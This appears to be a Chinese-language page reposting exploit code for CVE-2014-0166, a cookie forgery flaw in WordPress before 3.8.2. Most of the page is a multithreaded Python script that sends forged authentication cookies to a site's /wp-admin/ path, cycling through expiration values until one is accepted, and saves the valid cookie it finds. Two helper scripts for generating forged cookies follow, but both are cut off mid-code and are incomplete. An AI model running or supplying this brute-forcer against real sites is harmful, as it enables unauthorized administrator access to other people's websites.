# CVE-2014-0166 WordPress before 3.7.2 and 3.8.x before 3.8.2 僞造Cookie獲得權限漏洞
==INFO==
WordPress < 3.8.2 cookie forgery vulnerability
===cookieForger.py===
#!/usr/bin/env python “”” This script is the EXP of CVE-2014-0166. By varying the expiration value of the cookie, an attacker can find a ‘zero hash’ to forge a valid cookie. However, on average, we need 300 million requets to find a ‘zero hash’. Therefore I wrote this multithread script. Details: http://www.ettack.org/wordpress-cookie-forgery/ Author: Ettack Email: [email protected] “”” import requests import hmac import threading from hashlib import md5 from sys import stdout from time import sleep,ctime,gmtime,time from os import _exit initnum = 0 #Set the initial value here while performing distributed computing. threadNum = 500 errTolerance = 0 #If ErrorRequests/AllRequests > errTolerance, then decrease threads number lock = threading.Lock() url = ‘http://test.com’ user = ‘ettack’ expiration = 1400000000+initnum cnt = 0+initnum cookie_k = ‘wordpress_’ + md5(url).hexdigest() def testCookie(url,user,expr): global errcnt cookie_v = user + ‘|’ + str(expr) + ‘|0’ cookie = {cookie_k:cookie_v} try: r = requests.head(url + ‘/wp-admin/’,cookies=cookie) except requests.exceptions.ConnectionError: errcnt += 1 # print “Connection ERROR occured in %s”%(threading.current_thread()) sleep(8) return “Err” statcode = r.status_code if statcode == 200: return cookie if statcode != 302: errcnt += 1 sleep(5) return “Err” return False def action(): lock.acquire() global expiration,cnt expiration += 1 cnt += 1 stdout.flush() stdout.write(“\r%s”%(cnt)) lock.release() try: #Copy expiration value to expr.As expiration would be increased by other threads. expr = expiration #Loop until no error while True: result = testCookie(url,user,expr) if result != “Err”: break except KeyboardInterrupt: print “Interrupted at %s”%(expiration) _exit(0) except Exception,e: print e #Cookie found! Output to screen and file (wp_result). Output consumed time as well. if result != False: print “\n\nCongratulations!!! Found valid cookie:” print str(result) dtime = time()-stime timestr = gmtime(dtime) print “\nRunning time: %sd %sh %sm %ss”%(timestr.tm_mday-1,timestr.tm_hour,timestr.tm_min,timestr.tm_sec) with open(“wp_result”,”w”) as fp: fp.write(str(result)) fp.close() _exit(0) stime = time() print “Start at %s”%(ctime()) print “Guessing with %d threads…\n”%(threadNum) #Main part of guessing program while True: threads = [] errcnt = 0 for i in xrange(threadNum): t = threading.Thread(target = action) threads.append(t) t.start() for t in threads: t.join() #Adjust threads number errRate = float(errcnt)/threadNum if errRate > errTolerance: newThreadNum = int(threadNum * (1-0.5*errRate)) print “\nToo many retries (%d/%d). Automatically decrease to %d threads!”%(errcnt,threadNum+errcnt,newThreadNum) threadNum = newThreadNum #Log process to wp_log with open(“wp_log”,”w”) as fp: fp.write(str(cnt)) fp.close()
===wp_zero_cookie_generator.php===
user_pass, 8, 4)
$scheme = '';
$unit = 100000000;
$init = empty($argv[1])?0:$argv[1]*$unit; //Start point. e.g. 2 for 200000000
$exptime = 1400000000+$init;
$cnt = 0+$init;
$max = $init + $unit;
function gen_cookie($site_url,$user,$exptime,$pass_frag,$scheme) {
$lk = 'E..y-UBzte>Ddu^pF~kFsCPd6zD)%gar?0lBPiki9Kg_M`^
===zeroCather.py===
import re,hmac
from multiprocessing import Process,Value
from sys import stdout
user = 'ettack'
pass_frag = 'u5dr'
pnum = 8
exprstart = 1400000000
def gen_cookie(user,exptime,pass_frag):
lk = 'dBr|SFMq6`VaOFKw>r~^Npl(-z &OA(9{(W &(?2h&I}v1!V+Kx.m|uV-:z89L72'
ls = 'a=ec%X>I>#/@z>b);!*Qk*!&zS)@3[wW+o+2@gFz5xK$v&P@kV@I(YkJV4i9
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容